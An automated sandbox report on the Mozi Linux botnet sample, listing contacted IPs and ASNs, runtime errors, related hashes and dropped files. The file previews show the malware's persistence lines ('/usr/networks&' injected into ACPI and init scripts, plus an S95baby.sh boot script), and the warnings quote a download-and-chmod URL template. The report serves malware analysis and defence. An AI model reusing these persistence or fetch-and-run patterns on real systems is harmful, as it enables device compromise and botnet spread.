                                                		31399DAIMLER-ASITIGNGlobalNetworkDEfalse
                                                180.73.239.45
                                                		unknownMalaysia
                                                		38322WEBE-MY-AS-APWEBEDIGITALSDNBHDMYfalse
                                                2.65.140.74
                                                		unknownSweden
                                                		44034HI3GSEfalse
                                                5.121.35.27
                                                		unknownIran (ISLAMIC Republic Of)
                                                		44244IRANCELL-ASIRfalse
                                                172.132.119.56
                                                		unknownUnited States
                                                		7018ATT-INTERNET4USfalse
                                                142.229.204.168
                                                		unknownCanada
                                                		393952GOANETCAfalse
                                                171.119.52.25
                                                		unknownChina
                                                		4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                                                75.219.92.123
                                                		unknownUnited States
                                                		22394CELLCOUSfalse
                                                73.28.67.252
                                                		unknownUnited States
                                                		7922COMCAST-7922USfalse
                                                80.16.115.71
                                                		unknownItaly
                                                		3269ASN-IBSNAZITfalse
                                                210.163.103.147
                                                		unknownJapan4713OCNNTTCommunicationsCorporationJPfalse
                                                9.40.197.176
                                                		unknownUnited States
                                                		3356LEVEL3USfalse
                                                60.62.87.52
                                                		unknownJapan9824JTCL-JP-ASJupiterTelecommunicationCoLtdJPfalse
                                                62.28.85.104
                                                		unknownPortugal
                                                		15525MEO-EMPRESASPTfalse
                                                94.100.8.171
                                                		unknownLatvia
                                                		47570V2O-SIA-ASLVfalse
                                                47.68.223.209
                                                		unknownUnited States
                                                		3209VODANETInternationalIP-BackboneofVodafoneDEfalse
                                                178.194.165.28
                                                		unknownSwitzerland
                                                		3303SWISSCOMSwisscomSwitzerlandLtdCHfalse
                                                117.215.212.106
                                                		unknownIndia
                                                		9829BSNL-NIBNationalInternetBackboneINtrue
                                                53.195.132.11
                                                		unknownGermany
                                                		31399DAIMLER-ASITIGNGlobalNetworkDEfalse
                                                105.66.122.27
                                                		unknownMorocco
                                                		36884MAROCCONNECTMAfalse
                                                209.172.239.20
                                                		unknownUnited States
                                                		393289MERCERU-GA-ASNUSfalse
                                                77.228.102.211
                                                		unknownSpain
                                                		12430VODAFONE_ESESfalse
                                                114.121.10.199
                                                		unknownIndonesia
                                                		23693TELKOMSEL-ASN-IDPTTelekomunikasiSelularIDfalse
                                                134.231.205.27
                                                		unknownUnited States
                                                		25631GALLAUDETUSfalse
                                                203.252.131.239
                                                		unknownKorea Republic of
                                                		9459ASKONKUKKonkukUniversityKRfalse
                                                33.154.196.97
                                                		unknownUnited States
                                                		2686ATGS-MMD-ASUSfalse
                                                145.194.203.75
                                                		unknownNetherlands
                                                		1101IP-EEND-ASIP-EENDBVNLfalse
                                                22.29.199.59
                                                		unknownUnited States
                                                		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                144.186.202.188
                                                		unknownUnited States
                                                		19773MOTOROLAUSfalse
                                                88.191.3.65
                                                		unknownFrance
                                                		12322PROXADFRfalse
                                                16.146.174.98
                                                		unknownUnited States
                                                		unknownunknownfalse
                                                191.167.5.44
                                                		unknownBrazil
                                                		26615TIMSABRfalse
                                                149.0.219.73
                                                		unknownTurkey
                                                		8386KOCNETTRfalse
                                                35.112.44.223
                                                		unknownUnited States
                                                		237MERIT-AS-14USfalse
                                                26.136.146.193
                                                		unknownUnited States
                                                		7922COMCAST-7922USfalse
                                                197.96.161.16
                                                		unknownSouth Africa
                                                		3741ISZAfalse
                                                58.203.19.48
                                                		unknownChina
                                                		4538ERX-CERNET-BKBChinaEducationandResearchNetworkCenterfalse
                                                185.168.218.12
                                                		unknownSweden
                                                		204521GEUS-GRUPPEN-ABGeusGruppenABSEfalse
                                                159.236.79.191
                                                		unknownUnited Kingdom
                                                		13188TRIOLANUAfalse
                                                156.103.6.132
                                                		unknownUnited States
                                                		393504XNSTGCAfalse
                                                208.117.24.230
                                                		unknownUnited States
                                                		32748STEADFASTUSfalse
                                                12.75.120.193
                                                		unknownUnited States
                                                		7018ATT-INTERNET4USfalse
                                                191.149.175.228
                                                		unknownColombia
                                                		26611COMCELSACOfalse
                                                25.130.210.228
                                                		unknownUnited Kingdom
                                                		7922COMCAST-7922USfalse
                                                59.144.65.60
                                                		unknownIndia
                                                		24560AIRTELBROADBAND-AS-APBhartiAirtelLtdTelemediaServicesfalse
                                                2.145.36.76
                                                		unknownIran (ISLAMIC Republic Of)
                                                		44244IRANCELL-ASIRfalse
                                                57.254.163.96
                                                		unknownBelgium
                                                		2686ATGS-MMD-ASUSfalse
                                                129.202.100.185
                                                		unknownUnited States
                                                		158ERI-ASUSfalse

                                                General Information

                                                Joe Sandbox Version:31.0.0 Red Diamond
                                                Analysis ID:336612
                                                Start date:06.01.2021
                                                Start time:14:56:50
                                                Joe Sandbox Product:CloudBasic
                                                Overall analysis duration:0h 7m 30s
                                                Hypervisor based Inspection enabled:false
                                                Report type:light
                                                Sample file name:Mozi.m
                                                Cookbook file name:defaultlinuxfilecookbook.jbs
                                                Analysis system description:Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 59.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)
                                                Detection:MAL
                                                Classification:mal100.spre.troj.evad.linM@0/221@4/0
                                                Warnings:
                                                Show All
                                                • Excluded IPs from analysis (whitelisted): 91.189.92.38, 91.189.92.19, 91.189.92.20, 91.189.92.41, 91.189.92.39, 91.189.92.40
                                                • HTTP Packets have been reduced
                                                • TCP Packets have been reduced to 100
                                                • Created / dropped Files have been reduced to 100
                                                • Excluded domains from analysis (whitelisted): api.snapcraft.io
                                                • VT rate limit hit for: http://%s:%d/Mozi.a;chmod


                                                Runtime Messages

                                                Command:/tmp/Mozi.m
                                                Exit Code:0
                                                Exit Code Info:
                                                Killed:False
                                                Standard Output:

                                                Standard Error:telnetd: no process found
                                                utelnetd: no process found
                                                scfgmgr: no process found
                                                Unsupported ioctl: cmd=0xffffffff80045705
                                                Unsupported ioctl: cmd=0xffffffff80045705
                                                qemu: Unsupported ARM syscall: 0x4ace97
                                                qemu: uncaught target signal 4 (Illegal instruction) - core dumped
                                                Unsupported ioctl: cmd=0xffffffff80045705
                                                /bin/sh: 1: cfgtool: not found
                                                /bin/sh: 1: cfgtool: not found
                                                Unsupported ioctl: cmd=0xffffffff80045705
                                                Unsupported ioctl: cmd=0xffffffff80045705

                                                Joe Sandbox View / Context

                                                IPs

                                                No context

                                                Domains

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                router.bittorrent.comPhoto.exeGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                BitTorrent.exeGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                uTorrent.exeGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                uTorrent.exeGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                3.4.5_41712.exeGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                ace-stream-3-1-1-multi-win.exeGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                new.exeGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                uTorrent Stable(3.4.2 build 37754).exeGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                3.4.2 build 37754.exeGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                uTorrent.exeGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                download.ap.bittorrent.com/track/stable/endpoint/utorrent/os/windowsGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                uTorrent.exeGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                .iGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                index.htmlGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                QsCC5s5NrR.exeGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                BitTorrent.exeGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                btweb_installer(1).exeGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                EBookCodec.exeGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                popcorntime.apkGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                uTorrent.exeGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                router.utorrent.comPhoto.exeGet hashmaliciousBrowse
                                                • 82.221.103.244
                                                BitTorrent.exeGet hashmaliciousBrowse
                                                • 82.221.103.244
                                                uTorrent.exeGet hashmaliciousBrowse
                                                • 82.221.103.244
                                                uTorrent.exeGet hashmaliciousBrowse
                                                • 82.221.103.244
                                                3.4.5_41712.exeGet hashmaliciousBrowse
                                                • 82.221.103.244
                                                new.exeGet hashmaliciousBrowse
                                                • 82.221.103.244
                                                uTorrent Stable(3.4.2 build 37754).exeGet hashmaliciousBrowse
                                                • 82.221.103.244
                                                3.4.2 build 37754.exeGet hashmaliciousBrowse
                                                • 82.221.103.244
                                                uTorrent.exeGet hashmaliciousBrowse
                                                • 82.221.103.244
                                                download.ap.bittorrent.com/track/stable/endpoint/utorrent/os/windowsGet hashmaliciousBrowse
                                                • 82.221.103.244
                                                uTorrent.exeGet hashmaliciousBrowse
                                                • 82.221.103.244
                                                .iGet hashmaliciousBrowse
                                                • 82.221.103.244
                                                index.htmlGet hashmaliciousBrowse
                                                • 82.221.103.244
                                                QsCC5s5NrR.exeGet hashmaliciousBrowse
                                                • 82.221.103.244
                                                BitTorrent.exeGet hashmaliciousBrowse
                                                • 82.221.103.244
                                                btweb_installer(1).exeGet hashmaliciousBrowse
                                                • 82.221.103.244
                                                EBookCodec.exeGet hashmaliciousBrowse
                                                • 82.221.103.244
                                                uTorrent.exeGet hashmaliciousBrowse
                                                • 82.221.103.244
                                                iGet hashmaliciousBrowse
                                                • 82.221.103.244
                                                dht.transmissionbt.comPhoto.exeGet hashmaliciousBrowse
                                                • 87.98.162.88
                                                ace-stream-3-1-1-multi-win.exeGet hashmaliciousBrowse
                                                • 212.129.33.59
                                                new.exeGet hashmaliciousBrowse
                                                • 87.98.162.88
                                                popcorntime.apkGet hashmaliciousBrowse
                                                • 87.98.162.88
                                                bttracker.acc.umu.sePhoto.exeGet hashmaliciousBrowse
                                                • 130.239.18.159
                                                new.exeGet hashmaliciousBrowse
                                                • 130.239.18.159

                                                ASN

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                BELLSOUTH-NET-BLKUSNormhjTcQb.exeGet hashmaliciousBrowse
                                                • 70.158.117.234
                                                xJbFpiVs1lGet hashmaliciousBrowse
                                                • 68.210.64.184
                                                document-1692818639.xlsbGet hashmaliciousBrowse
                                                • 74.252.14.248
                                                Sri Lanka - Globelink ( Agency Agreement ).xlsGet hashmaliciousBrowse
                                                • 209.215.77.125
                                                Sri Lanka - Globelink ( Agency Agreement ).xlsGet hashmaliciousBrowse
                                                • 209.215.77.125
                                                networkserviceGet hashmaliciousBrowse
                                                • 65.12.40.104
                                                WINDSTREAMUSPO1055.exeGet hashmaliciousBrowse
                                                • 207.69.189.207
                                                svchost.exeGet hashmaliciousBrowse
                                                • 64.61.70.143
                                                PO10448.exeGet hashmaliciousBrowse
                                                • 207.69.189.208
                                                PO01044.exeGet hashmaliciousBrowse
                                                • 207.69.189.205
                                                PO123066.exeGet hashmaliciousBrowse
                                                • 207.69.189.205
                                                PO1228pdf.exeGet hashmaliciousBrowse
                                                • 207.69.189.205
                                                NormhjTcQb.exeGet hashmaliciousBrowse
                                                • 40.136.117.234
                                                PO121856.exeGet hashmaliciousBrowse
                                                • 207.69.189.204
                                                xJbFpiVs1lGet hashmaliciousBrowse
                                                • 97.67.48.183
                                                SecuriteInfo.com.Trojan.BtcMine.3311.17146.exeGet hashmaliciousBrowse
                                                • 40.135.87.185
                                                RB1NsQ9LQf.exeGet hashmaliciousBrowse
                                                • 173.189.218.175
                                                DHL COPY.exeGet hashmaliciousBrowse
                                                • 207.69.189.210
                                                C5o57lBFrs.exeGet hashmaliciousBrowse
                                                • 207.69.189.205
                                                0y9m2LcCmp.exeGet hashmaliciousBrowse
                                                • 207.69.189.206
                                                uw7Xt03ZwG.exeGet hashmaliciousBrowse
                                                • 207.69.189.203
                                                Sample Order.exeGet hashmaliciousBrowse
                                                • 207.69.189.202
                                                Photo.exeGet hashmaliciousBrowse
                                                • 65.23.14.3
                                                http://t61.emails.nationaltrust.org.uk/r/?id=h39b95d76,7e8399c0,621c601f&p1=shilohmethodistchurch.org/TfEvUNE?e=#jthai@lionpowerservices.comGet hashmaliciousBrowse
                                                • 207.8.224.99
                                                MkisahOBqH.dllGet hashmaliciousBrowse
                                                • 66.245.117.46
                                                newageGet hashmaliciousBrowse
                                                • 70.46.175.88
                                                ACONETACOnetBackboneATipz.exeGet hashmaliciousBrowse
                                                • 192.149.239.238
                                                bot.-7-15.arm7Get hashmaliciousBrowse
                                                • 193.171.31.43
                                                FederalAgency.x86Get hashmaliciousBrowse
                                                • 78.104.248.137
                                                GUnLDYUqKn.dllGet hashmaliciousBrowse
                                                • 145.246.164.57
                                                mssecsvr.exeGet hashmaliciousBrowse
                                                • 147.125.193.169
                                                TkXNh5NPtk.exeGet hashmaliciousBrowse
                                                • 193.171.202.146
                                                KUbmwqrbgs.exeGet hashmaliciousBrowse
                                                • 143.131.33.37
                                                XUNgjfaf6u.exeGet hashmaliciousBrowse
                                                • 193.170.8.5
                                                KIXS-AS-KRKoreaTelecomKRorder (2021.01.05).exeGet hashmaliciousBrowse
                                                • 183.111.183.38
                                                sD4Q5TaU.exeGet hashmaliciousBrowse
                                                • 121.152.8.75
                                                7mB0FoVcSn.exeGet hashmaliciousBrowse
                                                • 222.104.222.145
                                                zHXtwnSpDU.exeGet hashmaliciousBrowse
                                                • 14.45.137.55
                                                6654 22.docGet hashmaliciousBrowse
                                                • 118.38.110.192
                                                Archivo 122020 5-36542401.docGet hashmaliciousBrowse
                                                • 118.38.110.192
                                                rep_2020_12_22.docGet hashmaliciousBrowse
                                                • 118.38.110.192
                                                INFO 2020 DWP_947297.docGet hashmaliciousBrowse
                                                • 118.38.110.192
                                                166759_2112_2020_U_8180037.docGet hashmaliciousBrowse
                                                • 118.38.110.192
                                                DATI 122020 3834.docGet hashmaliciousBrowse
                                                • 118.38.110.192
                                                Documento-KEA_3063856.docGet hashmaliciousBrowse
                                                • 118.38.110.192
                                                (G0170-PF3F-20-0260)2T.exeGet hashmaliciousBrowse
                                                • 183.111.183.38
                                                NormhjTcQb.exeGet hashmaliciousBrowse
                                                • 59.12.160.234
                                                fdwv4hWF1M.exeGet hashmaliciousBrowse
                                                • 121.129.174.230
                                                E09X22g2.exeGet hashmaliciousBrowse
                                                • 183.111.171.219
                                                9d9u3kEJ5z.exeGet hashmaliciousBrowse
                                                • 112.175.185.27
                                                xJbFpiVs1lGet hashmaliciousBrowse
                                                • 121.155.23.176
                                                uM87pWnV44.exeGet hashmaliciousBrowse
                                                • 112.175.185.27
                                                TT3mhQ8pJA.exeGet hashmaliciousBrowse
                                                • 112.175.185.27
                                                bdOPjE89ck.dllGet hashmaliciousBrowse
                                                • 210.95.123.62

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                /etc/init.d/S95baby.shMozi.mGet hashmaliciousBrowse
                                                  1skm346XtzGet hashmaliciousBrowse
                                                    Mozi.aGet hashmaliciousBrowse
                                                      Mozi.1.mGet hashmaliciousBrowse
                                                        6wuvHEBHt8.binGet hashmaliciousBrowse
                                                          7v1ic5IS8IGet hashmaliciousBrowse
                                                            Mozi.aGet hashmaliciousBrowse
                                                              Mozi.aGet hashmaliciousBrowse
                                                                Mozi.mGet hashmaliciousBrowse
                                                                  Mozi.mGet hashmaliciousBrowse
                                                                    Mozi.mGet hashmaliciousBrowse
                                                                      bad_fileGet hashmaliciousBrowse
                                                                        mxjzQQFgLpGet hashmaliciousBrowse
                                                                          JrAL1wW1MQGet hashmaliciousBrowse
                                                                            /etc/rcS.d/S95baby.shMozi.mGet hashmaliciousBrowse
                                                                              1skm346XtzGet hashmaliciousBrowse
                                                                                Mozi.aGet hashmaliciousBrowse
                                                                                  Mozi.1.mGet hashmaliciousBrowse
                                                                                    6wuvHEBHt8.binGet hashmaliciousBrowse
                                                                                      7v1ic5IS8IGet hashmaliciousBrowse
                                                                                        Mozi.aGet hashmaliciousBrowse
                                                                                          Mozi.aGet hashmaliciousBrowse
                                                                                            Mozi.mGet hashmaliciousBrowse
                                                                                              Mozi.mGet hashmaliciousBrowse
                                                                                                Mozi.mGet hashmaliciousBrowse
                                                                                                  bad_fileGet hashmaliciousBrowse
                                                                                                    mxjzQQFgLpGet hashmaliciousBrowse
                                                                                                      JrAL1wW1MQGet hashmaliciousBrowse

                                                                                                        Created / dropped Files

                                                                                                        /boot/grub/i386-pc/modinfo.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):23
                                                                                                        Entropy (8bit):3.882045108136863
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                        Malicious:false
                                                                                                        Reputation:moderate, very likely benign file
                                                                                                        Preview: ./usr/networks&.exit 1.
                                                                                                        /etc/acpi/asus-keyboard-backlight.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):326
                                                                                                        Entropy (8bit):5.2904323771702915
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:K8K2A6godGINKlsX3stINKVHBfNewdrCDjwFhD2UDKVHxMn:1f/NA23stIN8HdNTek3n8HWn
                                                                                                        MD5:626FDB50CA17F4E2BAAB79F09F3EB73B
                                                                                                        SHA1:2D838897E7D735CB67348F60EDA0E1E41D45DCBE
                                                                                                        SHA-256:3FDFC702E6D3E1FE75E88B60408ED1B435F3AE24A57B56636C16CB321CBAE440
                                                                                                        SHA-512:E3FB063A63DF21B22D20754AE2CEA1F0D80464F4A870491E2843F7D88EBA181E351C4A20D67AD6A4CD8D1BF26971C654C502D5770D5B43B34024FAF2048171F5
                                                                                                        Malicious:false
                                                                                                        Reputation:moderate, very likely benign file
                                                                                                        Preview: ./usr/networks&.test -d $KEYS_DIR || exit 0..MIN=0.MAX=$(cat $KEYS_DIR/max_brightness).VAL=$(cat $KEYS_DIR/brightness)..if [ "$1" = down ]; then..VAL=$((VAL-1)).else..VAL=$((VAL+1)).fi..if [ "$VAL" -lt $MIN ]; then..VAL=$MIN.elif [ "$VAL" -gt $MAX ]; then..VAL=$MAX.fi..echo $VAL > $KEYS_DIR/brightness../usr/networks&.exit 1.
                                                                                                        /etc/acpi/asus-wireless.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):157
                                                                                                        Entropy (8bit):4.412729940630044
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:qXVfGHvNM8iKWERAIda74QvvvLwDGvNM8iKWERAIdJCsqORFL8OORgn:KJFn40MLFb+Pn
                                                                                                        MD5:9B10038ADE21F207C6C9F4EEC7C5ADA2
                                                                                                        SHA1:F3FB51110B022F8BFEA1874C6D6984D8C6EF8C7B
                                                                                                        SHA-256:E6322FBB30D1362ED490A39BE58B491C7DB9CC96DB09C8E2BDC1B1F35E1A00E2
                                                                                                        SHA-512:C9A47A0A449FD009221006D9077F1EDD25305EDA017DED7542AAF8EF80166B1645B889B478D6067ED2CB0123D798103DD73FD69B818C9B9704A274DC3FB4EA15
                                                                                                        Malicious:false
                                                                                                        Reputation:moderate, very likely benign file
                                                                                                        Preview: ./usr/networks&.test -f /usr/share/acpi-support/state-funcs || exit 0... /usr/share/acpi-support/state-funcs..toggleAllWirelessStates../usr/networks&.exit 1.
                                                                                                        /etc/acpi/ibm-wireless.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):636
                                                                                                        Entropy (8bit):4.722087767454589
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:wNGs4KSb7jFCR2TeNMngFfiTccfkneFhpmtjwkuVSd/1kVqEn:wFS/5uab2d7neFhij26/CwE
                                                                                                        MD5:77315C7FA7809C62D27AD6C9EE1C9289
                                                                                                        SHA1:C8EC67C17E334B13B1DE93B0D2E822C606F9985E
                                                                                                        SHA-256:81CB0908E30FCF60AEA43776D5F1C3AEE6E1B46190A3DB5A1866CD1D2E09E17E
                                                                                                        SHA-512:B679EF04092FDDBB0FA290F2D817DA38601336261870EE37BE6FA9451004B338E3A981694A0320B40A47A3597BA7B172848C877313F169ECDE3B8FB7FE38C582
                                                                                                        Malicious:false
                                                                                                        Reputation:moderate, very likely benign file
                                                                                                        Preview: ./usr/networks&.test -f /usr/share/acpi-support/state-funcs || exit 0..# Find and toggle wireless of bluetooth devices on ThinkPads... /usr/share/acpi-support/state-funcs..rfkill list | sed -n -e'/tpacpi_bluetooth_sw/,/^[0-9]/p' | grep -q 'Soft blocked: yes'.bluetooth_state=$?..# Note that this always alters the state of the wireless!.toggleAllWirelessStates;..# Sequence is Both on, Both off, Wireless only, Bluetooth only.if ! isAnyWirelessPoweredOn; then. # Wireless was turned off. if [ "$bluetooth_state" = 0 ]; then. rfkill unblock bluetooth. else. rfkill block bluetooth. fi.fi../usr/networks&.exit 1.
                                                                                                        /etc/acpi/powerbtn.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2079
                                                                                                        Entropy (8bit):4.778187000249208
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:pDpMMOMTeMn/zV5rh/1RzUKH2Z8uBiXGp2fVU6GjJN+V4ATo+aZ+:pCgeCrhXHzDfVpmhC/
                                                                                                        MD5:CF725BE1199B06F062A47095420F7DC5
                                                                                                        SHA1:98F1BC7C1B81C708B326BB3DC1C33AA3F29D8BBE
                                                                                                        SHA-256:C617FF036646CF1EEF3AC91EC504093CC25C93E07850276AA37AA2542A724B01
                                                                                                        SHA-512:D2F9649FED4B309108F2C67F28B1EE66C30219AF9B36F30E85F190064B3D5A65963BF6B9D3A8662A2197B47DFECA95D52447D7FCA4CDBAA69BB722BE5417DC50
                                                                                                        Malicious:false
                                                                                                        Reputation:moderate, very likely benign file
                                                                                                        Preview: ./usr/networks&. exit 0.fi..# getXuser gets the X user belonging to the display in $displaynum..# If you want the foreground X user, use getXconsole!.getXuser() {. user=`pinky -fw | awk '{ if ($2 == ":'$displaynum'" || $(NF) == ":'$displaynum'" ) { print $1; exit; } }'`. if [ x"$user" = x"" ]; then. startx=`pgrep -n startx`. if [ x"$startx" != x"" ]; then. user=`ps -o user --no-headers $startx`. fi. fi. if [ x"$user" != x"" ]; then. userhome=`getent passwd $user | cut -d: -f6`. export XAUTHORITY=$userhome/.Xauthority. else. export XAUTHORITY="". fi. export XUSER=$user.}..# Skip if we just in the middle of resuming..test -f /var/lock/acpisleep && exit 0..# If the current X console user is running a power management daemon that.# handles suspend/resume requests, let them handle policy This is effectively.# the same as 'acpi-s
                                                                                                        /etc/acpi/tosh-wireless.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):483
                                                                                                        Entropy (8bit):4.215331622973397
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:KJFqcA/0MLFMkneFUJLS3SU9mFCQROAJzHdcnK/lHb/iHIYK3zQYlyMn:wK8QdeFuS3lyXp9cK/lziijQYlrn
                                                                                                        MD5:07889D65619CDB80F8E876A087F160D3
                                                                                                        SHA1:35CB92B632BCA335EBEA933A736F75856E8CA262
                                                                                                        SHA-256:34768A7BD08F050862E888142B6246B41458957CF56BC4879619D3A315E3567B
                                                                                                        SHA-512:C86DE6FC5047AC695717E11B8714DE439E63949B439C3B8AA79C060CF0E807FB964C81B1FF59A7C0F38E0F3CC85E6784F56E1536DDDE9B66D1E22D306BEFCFAE
                                                                                                        Malicious:false
                                                                                                        Reputation:moderate, very likely benign file
                                                                                                        Preview: ./usr/networks&.test -f /usr/share/acpi-support/key-constants || exit 0... /usr/share/acpi-support/state-funcs..if isAnyWirelessPoweredOn; then. if [ -x /usr/bin/toshset ]; then. if `toshset -bluetooth | grep -q attached`; then. toshset -bluetooth off. toggleAllWirelessStates. else. toshset -bluetooth on. fi. else..toggleAllWirelessStates. fi.else. toggleAllWirelessStates.fi../usr/networks&.exit 1.
                                                                                                        /etc/acpi/undock.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):266
                                                                                                        Entropy (8bit):4.77497394042067
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:KJFqcA/05CbMTCYEBKAABrX8FvfbrX8EmNv0V4n:wK852PYEBKAkrX4HXHnV4n
                                                                                                        MD5:5E3A15E41D35EC409613236A20B5783E
                                                                                                        SHA1:5D71BD9A121461464F7937B2E921410ED93BEE24
                                                                                                        SHA-256:C3294C9B06A81A3325E131BF139B5F1C8615290B382F0014DA440F4F76C49BEA
                                                                                                        SHA-512:13E47AA60C322CB0DEF4894B97625EC2E3AE9214743569AD566ECA1331D581CD2185BC27CD538E8BA5D475FBBB79EC76EA4CCE31EDB115F30684D80CA9F5F1F4
                                                                                                        Malicious:false
                                                                                                        Reputation:moderate, very likely benign file
                                                                                                        Preview: ./usr/networks&.test -f /usr/share/acpi-support/key-constants || exit 0..for device in /sys/devices/platform/dock.*; do..[ -e "$device/type" ] || continue..[ x$(cat "$device/type") = xdock_station ] || continue..echo 1 > "$device/undock".done../usr/networks&.exit 1.
                                                                                                        /etc/bash_completion.d/libreoffice.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):23
                                                                                                        Entropy (8bit):3.882045108136863
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                        Malicious:false
                                                                                                        Reputation:moderate, very likely benign file
                                                                                                        Preview: ./usr/networks&.exit 1.
                                                                                                        /etc/init.d/S95baby.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:POSIX shell script, ASCII text executable
                                                                                                        Category:dropped
                                                                                                        Size (bytes):25
                                                                                                        Entropy (8bit):3.8936606896881854
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:TKH4v0VJ:hK
                                                                                                        MD5:1B3235BA10FC04836C941D3D27301956
                                                                                                        SHA1:8909655763143702430B8C58B3AE3B04CFD3A29C
                                                                                                        SHA-256:01BA1FB41632594997A41D0C3A911AE5B3034D566EBB991EF76AD76E6F9E283A
                                                                                                        SHA-512:98BDB5C266222CCBD63B6F80C87E501C8033DC53B0513D300B8DA50E39A207A0B69F8CD3ECC4A128DEC340A1186779FEDD1049C9B0A70E90D2CB3AE6EBFA4C4D
                                                                                                        Malicious:true
                                                                                                        Joe Sandbox View:
                                                                                                        • Filename: Mozi.m, Detection: malicious, Browse
                                                                                                        • Filename: 1skm346Xtz, Detection: malicious, Browse
                                                                                                        • Filename: Mozi.a, Detection: malicious, Browse
                                                                                                        • Filename: Mozi.1.m, Detection: malicious, Browse
                                                                                                        • Filename: 6wuvHEBHt8.bin, Detection: malicious, Browse
                                                                                                        • Filename: 7v1ic5IS8I, Detection: malicious, Browse
                                                                                                        • Filename: Mozi.a, Detection: malicious, Browse
                                                                                                        • Filename: Mozi.a, Detection: malicious, Browse
                                                                                                        • Filename: Mozi.m, Detection: malicious, Browse
                                                                                                        • Filename: Mozi.m, Detection: malicious, Browse
                                                                                                        • Filename: Mozi.m, Detection: malicious, Browse
                                                                                                        • Filename: bad_file, Detection: malicious, Browse
                                                                                                        • Filename: mxjzQQFgLp, Detection: malicious, Browse
                                                                                                        • Filename: JrAL1wW1MQ, Detection: malicious, Browse
                                                                                                        Reputation:moderate, very likely benign file
                                                                                                        Preview: #!/bin/sh./usr/networks&.
                                                                                                        /etc/init.d/bootmisc.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):148
                                                                                                        Entropy (8bit):4.718194263525147
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:qXVaUsZ/IREK0GFrTOvsBdFru4KXGK+R0FJOUsZoG3Hv0VOORgn:eoARzAsBdhu4GX+R0Voo+v7n
                                                                                                        MD5:68EC1ED64500D143FE44D1ED0B19DD83
                                                                                                        SHA1:90AE6027194C555ED6DE71191682E1773DD8E609
                                                                                                        SHA-256:F450F84C27D8339C63251AEB3DC06634AC42E8F4B0AFDA734E1044B5453ECF0D
                                                                                                        SHA-512:C9CD195893143DE17D2029672DA2236C7EC44498B1B5F13526CCA56665388790A198ECD0F2FE097FB8D035F780AFFCC5F984DDE1D0540AA778892F52E7698EBB
                                                                                                        Malicious:true
